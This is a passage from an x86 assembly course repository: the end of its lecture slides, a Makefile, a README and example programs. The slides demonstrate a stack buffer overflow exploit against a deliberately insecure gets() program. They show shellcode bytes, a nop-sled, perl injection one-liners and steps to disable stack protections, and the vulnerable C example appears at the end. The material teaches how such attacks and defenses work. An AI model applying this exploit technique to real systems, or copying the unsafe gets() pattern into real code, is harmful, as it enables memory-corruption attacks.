3194 | \begin{frame}[fragile,t]
3195 | \frametitle{Hello Shellcode Take 2 (example-shellcode2.S) Disassembly}
3196 | \mvs
3197 | \begin{customobjdumpcode}
3198 | $ objdump -D example-shellcode2
3199 | Disassembly of section .text:
3200 | 08048054 <_start>:
3201 |  8048054: eb 14                 jmp    804806a <get_str_addr>
3202 | 08048056 <got_str_addr>:
3203 |  8048056: 59                    pop    %ecx
3204 |  8048057: 31 c0                 xor    %eax,%eax
3205 |  8048059: 31 db                 xor    %ebx,%ebx
3206 |  804805b: 31 d2                 xor    %edx,%edx
3207 |  804805d: 43                    inc    %ebx
3208 |  804805e: 04 04                 add    $0x4,%al
3209 |  8048060: 80 c2 06              add    $0x6,%dl
3210 |  8048063: cd 80                 int    $0x80
3211 |  8048065: 31 c0                 xor    %eax,%eax
3212 |  8048067: 40                    inc    %eax
3213 |  8048068: cd 80                 int    $0x80
3214 | 0804806a <get_str_addr>:
3215 |  804806a: e8 e7 ff ff ff        call   8048056 <got_str_addr>
3216 |  804806f: 48                    dec    %eax
3217 |  8048070: 65                    gs
3218 |  8048071: 6c                    insb   (%dx),%es:(%edi)
3219 |  8048072: 6c                    insb   (%dx),%es:(%edi)
3220 |  8048073: 6f                    outsl  %ds:(%esi),(%dx)
3221 |  8048074: 21                    .byte 0x21
3222 | \end{customobjdumpcode}
3223 | \vspace{-0.5em}
3224 | \begin{itemize}
3225 |   \item No null bytes or newlines!
3226 | \end{itemize}
3227 | \end{frame}
3228 | 
3229 | 
3230 | \begin{frame}[fragile,t]
3231 | \frametitle{Preparing our Payload}
3232 | \begin{itemize}
3233 |   \item Reading off the {\ttfamily objdump} disassembly, we can write out the instructions as an ASCII string with escape characters
3234 | \end{itemize}
3235 | \begin{textcode}
3236 | "\xeb\x14\x59\x31\xc0\x31\xdb\x31\xd2\x43\x04\x04\x80\xc2\x06\xcd
3237 | \x80\x31\xc0\x40\xcd\x80\xe8\xe7\xff\xff\xff\x48\x65\x6c\x6c\x6f\x21"
3238 | \end{textcode}
3239 | \pause
3240 | \begin{itemize}
3241 |   \item So the plan is to pass a string to the insecure example with the shellcode, enough A's to overflow the buff, and a new return address
3242 | \pause
3243 |   \item But if the return address isn't exactly right, it won't work!
3244 | \pause
3245 |   \item We can make it more robust by adding a \textbf{nop-sled}: a bunch of nops preceding our shellcode
3246 |   \item Even if our guessed return address is off by a couple of bytes, as long as the CPU returns to somewhere within the nop-sled, execution will slide down to our real injected instructions
3247 |   \item Machine code for a {\ttfamily nop} is {\ttfamily 0x90}
3248 | \end{itemize}
3249 | \end{frame}
3250 | 
3251 | \begin{frame}[fragile,t]
3252 | \frametitle{The Actual Exploit...}
3253 | \mvs
3254 | \begin{itemize}
3255 |   \item First, find out how many A's it takes to break it...
3256 | \end{itemize}
3257 | \begin{textcode}
3258 | $ perl -e 'print "A" x 107' | ./example-insecure
3259 | input:
3260 | $ perl -e 'print "A" x 108' | ./example-insecure
3261 | input:
3262 | Segmentation fault
3263 | $
3264 | \end{textcode}
3265 | \pause
3266 | \begin{itemize}
3267 |   \item Then, use gdb to find out the number of A's to start overwriting the return address...
3268 | \end{itemize}
3269 | 
3270 | \begin{textcode}
3271 | $ gdb example-insecure
3272 | ...
3273 | 
3274 | <input 113 A's>
3275 | Program received signal SIGSEGV, Segmentation fault.
3276 | 0x08040041 in ?? ()
3277 | \end{textcode}
3278 | 
3279 | \begin{itemize}
3280 |   \item Lower byte of return address, now \%eip, was overwritten by an {\ttfamily 'A'}, or {\ttfamily 0x41}.
3281 | \end{itemize}
3282 | \end{frame}
3283 | 
3284 | \begin{frame}[fragile,t]
3285 | \frametitle{The Actual Exploit... (example-insecure\_exploit.sh) Continued}
3286 | \mvs
3287 | \begin{textcode*}{fontsize=\fontsize{8}{8}}
3288 | Prepare small nop-sled, shellcode, A's, and return address that is
3289 | 116 characters long.
3290 | 
3291 | $ perl -e 'print "\x90" x 20 . "\xeb\x14\x59\x31\xc0\x31\xdb\x31\xd2\x43
3292 |  \x04\x04\x80\xc2\x06\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe7\xff\xff\xff
3293 |  \x48\x65\x6c\x6c\x6f\x21" . "A" x 59 . "\x80\xf2\xff\xbf"' | wc
3294 |       0       1     116
3295 | \end{textcode*}
3296 | \pause
3297 | \begin{textcode*}{fontsize=\fontsize{8}{8}}
3298 | Guess at the return address, starting at 0xbffff280:
3299 | $ perl -e 'print "\x90" x 20 . "\xeb\x14\x59\x31\xc0\x31\xdb\x31\xd2\x43
3300 |  \x04\x04\x80\xc2\x06\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe7\xff\xff\xff
3301 |  \x48\x65\x6c\x6c\x6f\x21" . "A" x 59 . "\x80\xf2\xff\xbf"' | ./example-insecure
3302 | input:
3303 | Segmentation fault
3304 | \end{textcode*}
3305 | \pause
3306 | \begin{textcode*}{fontsize=\fontsize{8}{8}}
3307 | $ perl -e 'print "\x90" x 20 . "\xeb\x14\x59\x31\xc0\x31\xdb\x31\xd2\x43
3308 |  \x04\x04\x80\xc2\x06\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe7\xff\xff\xff
3309 |  \x48\x65\x6c\x6c\x6f\x21" . "A" x 59 . "\x70\xf2\xff\xbf"' | ./example-insecure
3310 | input:
3311 | Illegal instruction
3312 | \end{textcode*}
3313 | \pause
3314 | \begin{textcode*}{fontsize=\fontsize{8}{8}}
3315 | $ perl -e 'print "\x90" x 20 . "\xeb\x14\x59\x31\xc0\x31\xdb\x31\xd2\x43
3316 |  \x04\x04\x80\xc2\x06\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe7\xff\xff\xff
3317 |  \x48\x65\x6c\x6c\x6f\x21" . "A" x 59 . "\x60\xf2\xff\xbf"' | ./example-insecure
3318 | input:
3319 | Hello!$
3320 | \end{textcode*}
3321 | \end{frame}
3322 | 
3323 | \begin{frame}[fragile,t]
3324 | \frametitle{Closing Notes}
3325 | \begin{itemize}
3326 |   \item If vulnerable program was running as root, shellcode can spawn a root shell
3327 |   \item If vulnerable program was suid root, shellcode can {\ttfamily setuid(0)} and then spawn a root shell
3328 |   \pause
3329 |   \item We had to disable three security mechanisms to allow the traditional stack-based buffer overflow to work.
3330 |   \begin{itemize}
3331 |     \item GCC Stack Protector \\ (disabled with {\small \ttfamily -fno-stack-protector} gcc option)
3332 |     \item Non-Executable Stack \\ (disabled with {\small \ttfamily -z execstack} gcc option)
3333 |     \item Address Space Layout Randomization \\ (disabled by writing 0 to {\small \ttfamily /proc/sys/kernel/randomize\_va\_space})
3334 |   \end{itemize}
3335 | \end{itemize}
3336 | \end{frame}
3337 | 
3338 | \begin{frame}[fragile,t]
3339 | \frametitle{Security Mechanisms to Prevent Stack-based Buffer Overflows}
3340 | \begin{itemize}
3341 |   \item GCC Stack Protector
3342 |   \begin{itemize}
3343 |     \item GCC generates code to install a random guard value on the stack, below the saved frame pointer, and checks for its validity before the function returns
3344 |     \item If the guard value is corrupted by a buffer overflow, the pre-return check will catch it
3345 |   \end{itemize}
3346 |   \pause
3347 |   \item Non-Executable Stack
3348 |   \begin{itemize}
3349 |     \item NX page table entry bit introduced in x86-64 processors. Linux kernel uses them to mark the stack non-executable, so shellcode cannot execute from the stack
3350 |   \end{itemize}
3351 |   \pause
3352 |   \item Address Space Layout Randomization
3353 |   \begin{itemize}
3354 |     \item User program address space is randomized to make it difficult to guess shared library function locations or stack variable locations
3355 |     \item Increases difficulty of finding a suitable return address
3356 |   \end{itemize}
3357 | \end{itemize}
3358 | \end{frame}
3359 | 
3360 | \section{Extra Topic 1: Intel/nasm Syntax}
3361 | 
3362 | \begin{frame}[fragile,t]
3363 | \frametitle{Differences}
3364 | \begin{itemize}
3365 |   \item Intel Syntax: {\ttfamily <mnemonic> <dest>, <src>}
3366 |   \item Directives are not preceded by a dot {\ttfamily .}
3367 |   \item Less prefixes/suffixes floating around, so source looks cleaner
3368 |   \pause
3369 |   \item Memory addresses are just plain symbol names
3370 |   \item Memory dereferenced with brackets {\ttfamily [ ... ]}
3371 |   \pause
3372 |   \item Instruction size usually implied by registers used, but is made explicit when necessary with {\ttfamily byte, word, dword} keywords
3373 |   \begin{itemize}
3374 |     \item {\ttfamily mov [ebp-4], dword 42}
3375 |   \end{itemize}
3376 |   \vs
3377 |   \pause
3378 |   \item Indirect memory accesses spelled out as expressions
3379 |   \begin{itemize}
3380 |     \item AT\&T / GAS: {\ttfamily movl \%eax, -12(\%ebp, \%ecx, 4)}
3381 |     \item Intel / NASM: {\ttfamily mov [ebp+ecx*4-12], eax}
3382 |   \end{itemize}
3383 | \end{itemize}
3384 | \end{frame}
3385 | 
3386 | \begin{frame}[fragile,t]
3387 | \frametitle{Side-by-side Hello World Syscall Example (example-hello-nasm.asm)}
3388 | \mvs \mvs
3389 | \begin{columns}[T]
3390 | \column{0.5\textwidth}
3391 | \begin{gascode*}{frame=single}
3392 | .section .text
3393 | .global _start
3394 | _start:
3395 |   # open("foo", ...);
3396 |   movl $0x05, %eax
3397 |   movl $filename, %ebx
3398 |   movl $0x41, %ecx
3399 |   movl $0644, %edx
3400 |   int $0x80
3401 | 
3402 |   # fd in %eax -> %ebx
3403 |   movl %eax, %ebx
3404 | 
3405 |   # write(fd, ...);
3406 |   movl $0x04, %eax
3407 |   # fd in %ebx from above
3408 |   movl $message, %ecx
3409 |   movl $messageLen, %edx
3410 |   int $0x80
3411 | 
3412 |   # close(fd);
3413 |   movl $0x06, %eax
3414 |   # fd still in %ebx
3415 |   int $0x80
3416 | \end{gascode*}
3417 | \column{0.5\textwidth}
3418 | \begin{nasmcode*}{frame=single}
3419 | section .text
3420 | global _start
3421 | _start:
3422 |   ; open("foo", ...);
3423 |   mov eax, 5
3424 |   mov ebx, filename
3425 |   mov ecx, 0x41
3426 |   mov edx, 0q644
3427 |   int 0x80
3428 | 
3429 |   ; fd in eax -> ebx
3430 |   mov ebx, eax
3431 | 
3432 |   ; write(fd, ...);
3433 |   mov eax, 4
3434 |   ; fd in ebx from above
3435 |   mov ecx, message
3436 |   mov edx, messageLen
3437 |   int 0x80
3438 | 
3439 |   ; close(fd);
3440 |   mov eax, 6
3441 |   ; fd still in ebx
3442 |   int 0x80
3443 | \end{nasmcode*}
3444 | \end{columns}
3445 | \end{frame}
3446 | 
3447 | \begin{frame}[fragile,t]
3448 | \frametitle{Side-by-side Hello World Syscall Example (example-hello-nasm.asm) Continued}
3449 | \mvs
3450 | \begin{columns}[T]
3451 | \column{0.5\textwidth}
3452 | \begin{gascode*}{frame=single}
3453 |   # exit(0);
3454 |   movl $0x01, %eax
3455 |   movl $0x0, %ebx
3456 |   int $0x80
3457 | 
3458 | .section .data
3459 | filename:   .ascii "foo\0"
3460 | message:    .ascii "Hello World!\n"
3461 | .equ messageLen, . - message
3462 | \end{gascode*}
3463 | \column{0.5\textwidth}
3464 | \begin{nasmcode*}{frame=single}
3465 |   ; exit(0);
3466 |   mov eax, 1
3467 |   mov ebx, 0
3468 |   int 0x80
3469 | 
3470 | section .data
3471 | filename:   db 'foo',0
3472 | message:    db 'Hello World!',10
3473 | messageLen: equ $ - message
3474 | \end{nasmcode*}
3475 | \end{columns}
3476 | \vs
3477 | {\footnotesize Runtime:}
3478 | \begin{textcode}
3479 | $ nasm -f elf example-hello-nasm.asm -o example-hello-nasm.o
3480 | $ ld example-hello-nasm.o -o example-hello-nasm
3481 | $ ./example-hello-nasm
3482 | $ cat foo
3483 | Hello World!
3484 | $
3485 | \end{textcode}
3486 | \end{frame}
3487 | 
3488 | \section{Extra Topic 2: x86-64 Assembly}
3489 | 
3490 | \begin{frame}[fragile,t]
3491 | \frametitle{Immediate Differences}
3492 | \begin{itemize}
3493 |   \item {\ttfamily \%eax} extended to 64-bit {\ttfamily \%rax}, along with \\
3494 |   {\ttfamily \%rax, \%rbx, \%rcx, \%rdx, \%rbp, \%rsp, \%rsi, \%rdi}
3495 |   \item Supplemental general purpose registers \\
3496 |   {\ttfamily \%r8, \%r9, \%r10, \%r11, \%r12, \%r13, \%r14, \%r15}
3497 |   \vs \vs
3498 |   \item Good architectural changes
3499 |   \begin{itemize}
3500 |     \item Segmentation and hardware task switching wiped away
3501 |     \item No-Execute bit in page table entries to enforce non-executable sections
3502 |   \end{itemize}
3503 |   \vs
3504 |   \item A lot of q's instead of l's: {\ttfamily movq, pushq, addq}
3505 |   \item Stack pushes and pops are all typically 8-byte / 64-bit values
3506 |   \item {\small \url{http://en.wikipedia.org/wiki/X86-64#Architectural\_features}}
3507 | \end{itemize}
3508 | \end{frame}
3509 | 
3510 | \begin{frame}[fragile,t]
3511 | \frametitle{Different Calling Convention}
3512 | \begin{itemize}
3513 |   \item System V ABI
3514 |   \item \url{http://www.x86-64.org/documentation/abi.pdf}
3515 |   \item Function Call Convention (Linux)
3516 |   \begin{itemize}
3517 |     \item Arguments passed in registers: {\ttfamily \%rdi, \%rsi, \%rdx, \%rcx, \%r8, \%r9}
3518 |     \item Extra arguments pushed onto the stack
3519 |     \item Function must preserve {\ttfamily \%rbp, \%rbx, \%r12 - \%r15}
3520 |     \item Function can use rest of registers
3521 |     \item Return value in {\%rax}
3522 |   \end{itemize}
3523 |   \item System Call Convention (Linux)
3524 |   \begin{itemize}
3525 |     \item Syscall number in {\ttfamily \%rax}
3526 |     \item Arguments passed in registers: {\ttfamily \%rdi, \%rsi, \%rdx, \%r10, \%r8, \%r9}
3527 |     \item Use {\ttfamily syscall} instruction
3528 |     \item {\ttfamily \%rcx} and {\ttfamily \%r11} destroyed
3529 |     \item Return value in {\%rax}
3530 |   \end{itemize}
3531 | \end{itemize}
3532 | \end{frame}
3533 | 
3534 | \section{Resources and Next Steps}
3535 | 
3536 | \begin{frame}[fragile,t]
3537 | \frametitle{Essential Links}
3538 | \begin{itemize}
3539 |   \item x86-32 + x86-64 instruction set: \\ \url{http://ref.x86asm.net/}
3540 |   \item Official x86-32 + x86-64 architecture info: \\ \url{http://www.intel.com/content/www/us/en/processors/architectures-software-developer-manuals.html}
3541 |   \item Unofficial x86-32 + x86-64 architecture info: \\ \url{http://sandpile.org/}
3542 |   \item Linux System Call Reference: \\ \url{http://syscalls.kernelgrok.com/}
3543 |   \item Assembly Optimization Tips: \\ \url{http://www.mark.masmcode.com/}
3544 |   \item Interesting "assembly gems": \\ \url{http://www.df.lth.se/~john\_e/fr\_gems.html}
3545 | \end{itemize}
3546 | \end{frame}
3547 | 
3548 | \begin{frame}[fragile,t]
3549 | \frametitle{Going From Here}
3550 | \vspace{-0.5em}
3551 | \begin{itemize}
3552 |   \item Play with the examples
3553 |   \begin{itemize}
3554 |     \item Modify Morse Encoder example to handle words ({\ttfamily morse.S})
3555 |     \item Add find and remove to Linked List example ({\ttfamily linked\_list.S})
3556 |     \item Modify Fibonacci to print with syscalls instead of {\ttfamily printf()}, ({\ttfamily fibonacci.S})
3557 |     \item Write a recursive Fibonacci Sequence generator
3558 |     \item Modify exploit shellcode to print a newline ({\ttfamily example-shellcode2.S})
3559 |   \end{itemize}
3560 |   \item Write your own syscall, e.g. rot13
3561 |   \item Do Stack Smashing challenges: \\ {\footnotesize \url{http://community.corest.com/~gera/InsecureProgramming/}}
3562 |   \item Rewrite a traditional *nix program in Assembly
3563 | \begin{itemize}
3564 |   \item e.g. telnet: \\ {\footnotesize \url{https://github.com/vsergeev/x86asm/blob/master/telnet.asm}}
3565 |   \item e.g. asmscan: \\ {\footnotesize\url{https://github.com/edma2/asmscan}}
3566 | \end{itemize}
3567 |   \item Write assembly for microcontrollers like Atmel AVR, Microchip PIC, and ARM Cortex M series
3568 | \end{itemize}
3569 | \end{frame}
3570 | 
3571 | \section*{Lingering Questions?}
3572 | 
3573 | \end{document}
3574 | 


--------------------------------------------------------------------------------
/examples/99_bottles_of_beer.S:
--------------------------------------------------------------------------------
 1 | # 99 Bottles of Beer on the Wall (example-10.S)
 2 | .section .text
 3 | .global main
 4 | main:
 5 |   movl $99, %eax    # Start with 99 bottles!
 6 |   # We could use a cdecl callee preserved register,
 7 |   # but we'll make it hard on ourselves to practice
 8 |   # caller saving/restoring
 9 | 
10 |   # printf(char *format, ...);
11 | 
12 |   more_beer:
13 |     # Save %eax since it will get used by printf()
14 |     pushl %eax
15 | 
16 |     # printf(formatStr1, %eax, %eax);
17 |     pushl %eax
18 |     pushl %eax
19 |     pushl $formatStr1   # *Address* of formatStr1
20 |     call printf
21 |     addl $12, %esp      # Clean up the stack
22 | 
23 |     # Restore %eax
24 |     popl %eax
25 |     # Drink a beer
26 |     decl %eax
27 | 
28 |     # Save %eax
29 |     pushl %eax
30 | 
31 |     # printf(formatStr2, %eax);
32 |     pushl %eax
33 |     pushl $formatStr2   # *Address* of formatStr2
34 |     call printf
35 |     addl $8, %esp       # Clean up the stack
36 | 
37 |     # Restore %eax
38 |     popl %eax
39 |     # Loop
40 |     test %eax, %eax
41 |     jnz more_beer
42 | 
43 |   # printf(formatStr3);
44 |   pushl $formatStr3
45 |   call printf
46 |   addl $4, %esp
47 | 
48 |   movl $0, %eax
49 |   ret
50 | 
51 | .section .data
52 |   formatStr1: .ascii "%d bottles of beer on the wall! %d bottles of beer!\n\0"
53 |   formatStr2: .ascii "Take one down, pass it around, %d bottles of beer on the wall!\n\0"
54 |   formatStr3: .ascii "No more bottles of beer on the wall!\n\0"
55 | 


--------------------------------------------------------------------------------
/examples/Makefile:
--------------------------------------------------------------------------------
 1 | EXAMPLES = example-strlen example-arith-mov example-cond-jmp example-static-alloc example-indirect-mem example-stack example-cdecl example-ebp example-syscall example-string1 example-string2 example-libc example-insecure example-addrstack example-shellcode1 example-shellcode2 example-hello-nasm fibonacci morse_encoder 99_bottles_of_beer linked_list tee
 2 | 
 3 | all:
 4 | # These C examples should be compiled & linked with gcc
 5 | 	gcc -m32 -Wall -O1 example-strlen.c -o example-strlen && objdump -D example-strlen > example-strlen.objdump
 6 | 	gcc -m32 -Wall example-insecure.c -o example-insecure && objdump -D example-insecure > example-insecure.objdump
 7 | 	gcc -m32 -Wall example-addrstack.c -o example-addrstack && objdump -D example-addrstack > example-addrstack.objdump
 8 | # These examples should be linked directlywith ld
 9 | 	as --32 -march=i686 example-arith-mov.S -o example-arith-mov.o && ld -m elf_i386 example-arith-mov.o -o example-arith-mov && objdump -D example-arith-mov > example-arith-mov.objdump
10 | 	as --32 -march=i686 example-cond-jmp.S -o example-cond-jmp.o && ld -m elf_i386 example-cond-jmp.o -o example-cond-jmp && objdump -D example-cond-jmp > example-cond-jmp.objdump
11 | 	as --32 -march=i686 example-static-alloc.S -o example-static-alloc.o && ld -m elf_i386 example-static-alloc.o -o example-static-alloc && objdump -D example-static-alloc > example-static-alloc.objdump
12 | 	as --32 -march=i686 example-indirect-mem.S -o example-indirect-mem.o && ld -m elf_i386 example-indirect-mem.o -o example-indirect-mem && objdump -D example-indirect-mem > example-indirect-mem.objdump
13 | 	as --32 -march=i686 example-stack.S -o example-stack.o && ld -m elf_i386 example-stack.o -o example-stack && objdump -D example-stack > example-stack.objdump
14 | 	as --32 -march=i686 example-cdecl.S -o example-cdecl.o && ld -m elf_i386 example-cdecl.o -o example-cdecl && objdump -D example-cdecl > example-cdecl.objdump
15 | 	as --32 -march=i686 example-ebp.S -o example-ebp.o && ld -m elf_i386 example-ebp.o -o example-ebp && objdump -D example-ebp > example-ebp.objdump
16 | 	as --32 -march=i686 example-syscall.S -o example-syscall.o && ld -m elf_i386 example-syscall.o -o example-syscall && objdump -D example-syscall > example-syscall.objdump
17 | 	as --32 -march=i686 tee.S -o tee.o && ld -m elf_i386 tee.o -o tee && objdump -D tee > tee.objdump
18 | 	as --32 -march=i686 example-string1.S -o example-string1.o && ld -m elf_i386 example-string1.o -o example-string1 && objdump -D example-string1 > example-string1.objdump
19 | 	as --32 -march=i686 example-shellcode1.S -o example-shellcode1.o && ld -m elf_i386 example-shellcode1.o -o example-shellcode1 && objdump -D example-shellcode1 > example-shellcode1.objdump
20 | 	as --32 -march=i686 example-shellcode2.S -o example-shellcode2.o && ld -m elf_i386 example-shellcode2.o -o example-shellcode2 && objdump -D example-shellcode2 > example-shellcode2.objdump
21 | # These examples should be linked with gcc/libc
22 | 	as --32 -march=i686 fibonacci.S -o fibonacci.o && gcc -m32 fibonacci.o -o fibonacci && objdump -D fibonacci > fibonacci.objdump
23 | 	as --32 -march=i686 morse_encoder.S -o morse_encoder.o && gcc -m32 morse_encoder.o -o morse_encoder && objdump -D morse_encoder > morse_encoder.objdump
24 | 	as --32 -march=i686 99_bottles_of_beer.S -o 99_bottles_of_beer.o && gcc -m32 99_bottles_of_beer.o -o 99_bottles_of_beer && objdump -D 99_bottles_of_beer > 99_bottles_of_beer.objdump
25 | 	as --32 -march=i686 linked_list.S -o linked_list.o && gcc -m32 linked_list.o -o linked_list && objdump -D linked_list > linked_list.objdump
26 | 	as --32 -march=i686 example-string2.S -o example-string2.o && gcc -m32 example-string2.o -o example-string2 && objdump -D example-string2 > example-string2.objdump
27 | 	as --32 -march=i686 example-libc.S -o example-libc.o && gcc -m32 example-libc.o -o example-libc && objdump -D example-libc > example-libc.objdump
28 | # These examples should be assembled with nasm and linked with ld
29 | 	nasm -f elf32 example-hello-nasm.asm -o example-hello-nasm.o && ld -m elf_i386 example-hello-nasm.o -o example-hello-nasm && objdump -D example-hello-nasm > example-hello-nasm.objdump
30 | 
31 | clean:
32 | 	rm -f $(EXAMPLES)
33 | 	rm -f $(addsuffix .o, $(EXAMPLES))
34 | 	rm -f $(addsuffix .objdump, $(EXAMPLES))
35 | 


--------------------------------------------------------------------------------
/examples/README:
--------------------------------------------------------------------------------
 1 | Only fibonacci, morse_encoder, 99_bottles_of_beer, linked_list, tee, example-9,
 2 | example-11, example-12, example-insecure, example-addrstack,
 3 | example-shellcode1, example-shellcode2, example-hello-nasm are meant to be
 4 | executed from command-line.
 5 | 
 6 | The other programs are just examples of instruction encodings that are meant to
 7 | be examined with objdump or single-stepped in gdb. They do not call syscall
 8 | exit() to exit properly, so they will likely segmentation fault when execution
 9 | falls through outside of .text.
10 | 
11 | 


--------------------------------------------------------------------------------
/examples/example-addrstack.c:
--------------------------------------------------------------------------------
 1 | /* Print address of a variable on the stack (example-addrstack.c) */
 2 | #include <stdio.h>
 3 | 
 4 | int main(void) {
 5 |   char c;
 6 |   printf("%p\n", &c);
 7 |   return 0;
 8 | }
 9 | 
10 | 


--------------------------------------------------------------------------------
/examples/example-arith-mov.S:
--------------------------------------------------------------------------------
 1 | # Example of Arithmetic and Data Transfer Instructions (example-arith-mov.S)
 2 | .section .text
 3 | .global _start
 4 | _start:
 5 |   # nop
 6 |   nop                        # ; (Do nothing!)
 7 | 
 8 |   # add, sub, adc, and, or, xor
 9 |   addl %eax, %ebx            # %ebx = %ebx + %eax
10 |   addl magicNumber, %ebx     # %ebx = %ebx + *(magicNumber)
11 |   addl %ebx, magicNumber     # *(magicNumber) = *(magicNumber) + %ebx
12 |   addl $0x12341234, %ebx     # %ebx = %ebx + 0x12341234
13 | 
14 |   # inc, dec, not, neg
15 |   decl %eax                  # %eax--
16 |   decw %ax                   # %ax--
17 |   decb %al                   # %al--
18 | 
19 |   # rol, rcl, shl, shr, sal, sar
20 |   shrl $3, %eax              # %eax = %eax >> 3
21 |   shrl $3, magicNumber       # *(magicNumber) = *(magicNumber) >> 3
22 | 
23 |   # mov
24 |   movl %eax, %ebx            # %ebx = %eax
25 |   movl magicNumber, %eax     # %eax = *(magicNumber)
26 |   movl %eax, magicNumber     # *(magicNumber) = %eax
27 | 
28 | .section .data
29 |   magicNumber: .long 0xdeadbeef  # *magicNumber = 0xdeadbeef;
30 | 


--------------------------------------------------------------------------------
/examples/example-cdecl.S:
--------------------------------------------------------------------------------
 1 | # Example of cdecl Calling Convention (example-cdecl.S)
 2 | .section .text
 3 | .global _start
 4 | _start:
 5 |   # sumThreeNumbers(*magicNumber, 5, 12);
 6 |   pushl $12             # Push 0x000000C
 7 |   pushl $5              # Push 0x0000005
 8 |   pushl magicNumber     # Push *magicNumber
 9 |   call sumThreeNumbers
10 |   addl $12, %esp        # Clean up arguments off of the stack
11 |   # %eax is 59
12 | 
13 | sumThreeNumbers:
14 |   # Stack is now
15 |   # |    ...     |
16 |   # |     12     | <- %esp+12
17 |   # |      5     | <- %esp+8
18 |   # |     42     | <- %esp+4
19 |   # | retaddr    | <- %esp
20 | 
21 |   movl $0, %eax        # Clear %eax
22 |   addl 4(%esp), %eax   # %eax += *(%esp+4)
23 |   addl 8(%esp), %eax   # %eax += *(%esp+8)
24 |   addl 12(%esp), %eax  # %eax += *(%esp+12)
25 |   ret
26 | 
27 | .section .data
28 |   magicNumber: .long 42
29 | 
30 | 


--------------------------------------------------------------------------------
/examples/example-cond-jmp.S:
--------------------------------------------------------------------------------
 1 | # Example of Conditional Jumps (example-cond-jmp.S)
 2 | .section .text
 3 | .global _start
 4 | _start:
 5 |   # cmpl %oper1, %oper2
 6 |   # updates flags based on result of %oper2 - %oper1
 7 |   cmpl %eax, %ecx
 8 |   cmpl $0xFF, %eax
 9 | 
10 |   # conditional jumps
11 |   je label_foo	  # jump if %oper2 == %oper1
12 |   jg label_bar    # jump if %oper2 > %oper1
13 |   jl label_xyz	  # jump if %oper2 < %oper1
14 | 
15 |   # test %oper1, %oper2
16 |   # updates flags based on result of %oper2 & %oper1
17 |   testl %eax, %ecx
18 |   testl $0x1F, %eax
19 | 
20 |   # arithmetic
21 |   # updates flags based on result
22 |   addl %eax, %ebx
23 |   incl %eax
24 |   decl %ebx
25 | 
26 |   # labels are just symbols containing an address to make
27 |   # it easy to specify addresses
28 |   label1:
29 |   label2:
30 |     movl $0, %eax     # %eax = 0
31 |     incl %eax         # %eax++ ; ZF set to 0!
32 |     jz label1         # Jump if ZF = 1 (not taken)
33 |     jnz label3        # Jump if ZF = 0 (taken)
34 |     decl %eax         # I won't be executed
35 |   label3:
36 |     nop
37 |     nop               # Execution will fall through
38 |   label4:
39 |     jmp label1        # Jump back to label1
40 | 
41 |   # Loops
42 |   movl $10, %eax
43 |   loop:
44 |     nop
45 |     decl %eax
46 |     jnz loop
47 | 
48 |   # Direct Comparison
49 |   cmpl $0x05, %eax
50 |   je label_foo      # Jump to label_foo if %eax == 5
51 | 
52 | label_foo:
53 |   nop
54 | label_bar:
55 |   nop
56 | label_xyz:
57 |   nop
58 | 


--------------------------------------------------------------------------------
/examples/example-ebp.S:
--------------------------------------------------------------------------------
 1 | # Example of using the Frame Pointer (example-ebp.S)
 2 | .section .text
 3 | .global _start
 4 | _start:
 5 |   pushl $22
 6 |   pushl $20
 7 |   pushl $42
 8 |   pushl $3
 9 |   call sumNumbers
10 |   addl $16, %esp
11 |   # %eax is now 84
12 | 
13 |   # sumNumbers(int n, ...)
14 |   sumNumbers:
15 |     # Function prologue, save old frame pointer and setup new one
16 |     pushl %ebp
17 |     movl %esp, %ebp
18 | 
19 |     movl $0, %eax       # Clear %eax
20 |     movl $0, %ecx       # Clear %ecx
21 |     movl 8(%ebp), %edx  # Copy argument 1 into %edx
22 | 
23 |     sumLoop:
24 |       # Add argument 2, 3, 4, ... n in %eax
25 |       # Argument 2 starts at %ebp+12
26 |       addl 12(%ebp, %ecx, 4), %eax
27 |       incl %ecx
28 | 
29 |       # Loop
30 |       decl %edx
31 |       jnz sumLoop
32 | 
33 |     # Function epilogue, deallocate and restore old frame pointer
34 |     movl %ebp, %esp
35 |     popl %ebp
36 |     ret
37 | 
38 | 


--------------------------------------------------------------------------------
/examples/example-hello-nasm.asm:
--------------------------------------------------------------------------------
 1 | ; Hello World System Call Example in nasm (example-hello-nasm.asm)
 2 | section .text
 3 | global _start
 4 | _start:
 5 |   ; open("foo", ...);
 6 |   mov eax, 5
 7 |   mov ebx, filename
 8 |   mov ecx, 0x41
 9 |   mov edx, 0q644
10 |   int 0x80
11 | 
12 |   ; fd in eax -> ebx
13 |   mov ebx, eax
14 | 
15 |   ; write(fd, ...);
16 |   mov eax, 4
17 |   ; fd in ebx from above
18 |   mov ecx, message
19 |   mov edx, messageLen
20 |   int 0x80
21 | 
22 |   ; close(fd);
23 |   mov eax, 6
24 |   ; fd still in ebx
25 |   int 0x80
26 | 
27 |   ; exit(0);
28 |   mov eax, 1
29 |   mov ebx, 0
30 |   int 0x80
31 | 
32 | section .data
33 | filename:   db 'foo',0
34 | message:    db 'Hello World!',10
35 | messageLen: equ $ - message
36 | 


--------------------------------------------------------------------------------
/examples/example-indirect-mem.S:
--------------------------------------------------------------------------------
 1 | # Example of Indirectly Accessing Memory (example-indirect-mem.S)
 2 | .section .text
 3 | .global _start
 4 | _start:
 5 |   movl $tableStart, %ebx          # Pointer to table start
 6 |                                   # We are moving the *value*
 7 |                                   # $tableStart, this is not a
 8 |                                   # memory access!
 9 |   movl $0, %ecx
10 |   loop:
11 |       movl (%ebx, %ecx, 4), %eax  # %eax = *(%ebx + 4*%ecx)
12 |       notl %eax                   # %eax = ~%eax
13 |       movl %eax, (%ebx, %ecx, 4)  # *(%ebx + 4*%ecx) = %eax
14 |       incl %ecx
15 |       cmpl $10, %ecx
16 |       jl loop
17 |   nop
18 | 
19 | .section .data
20 |   tableStart: .long 0x00000000, 0x00000001
21 |               .long 0x00000002, 0x00000003
22 |               .long 0x00000004, 0x00000005
23 |               .long 0x00000006, 0x00000007
24 |               .long 0x00000008, 0x00000009
25 | 
26 | 


--------------------------------------------------------------------------------
/examples/example-insecure.c:
--------------------------------------------------------------------------------
 1 | /* Insecure Example (example-insecure.c) */
 2 | /* Build with: gcc -fno-stack-protector -z execstack example-insecure.c -o example-insecure */
 3 | #include <stdio.h>
 4 | 
 5 | void get_input(void) {
 6 |   char buff[100];
 7 |   gets(buff);
 8 | }
 9 | 
10 | int main(void) {
